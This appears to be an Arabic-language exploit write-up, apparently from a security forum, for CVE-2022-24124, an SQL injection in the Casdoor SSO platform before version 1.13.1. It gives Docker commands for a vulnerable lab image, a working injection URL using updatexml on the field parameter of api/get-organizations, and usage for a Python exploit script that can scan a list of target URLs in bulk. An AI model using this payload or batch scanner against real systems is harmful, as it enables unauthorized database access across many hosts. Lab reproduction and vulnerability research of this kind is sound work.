
استغلال CVE-2022-24124
Casdoor هو منصة مركزية للمصادقة الموحدة (SSO) تعتمد على OAuth 2.0 / OIDC
رقم CVE: CVE-2022-24124
رقم CNPD: CNPD-202201-7304
مستوى الخطورة: عالي (7.5 HIGH)
POC/EXP: منشور
Casdoor < Casdoor 1.13.1 // جميع الإصدارات قبل 1.13.1 متأثرة
تنتمي هذه الثغرة الأمنية إلى ثغرات حقن SQL، حيث توجد ثغرة حقن SQL مرتبطة بمعلمات الحقل والقيمة في واجهة برمجة التطبيقات للاستعلام، كما هو موضح في api/get-organizations.
سحب صورة Docker للثغرة الأمنية
docker pull vulfocus/casdoor:1.13.0

تشغيل بيئة الثغرة الأمنية
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

فتح صفحة بيئة الثغرة الأمنية

استخدام POC لبناء الحمولة
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

https://nvd.nist.gov/vuln/detail/CVE-2022-24124
https://github.com/ColdFusionX/CVE-2022-24124
https://github.com/0xAbbarhSF/CVE-2022-24124
مأخوذ من https://www.t00ls.com/thread-66989-1-1.html
تم كتابة نسخة بلغة Python للتمرين، مع إضافة وظيفة الكشف الجماعي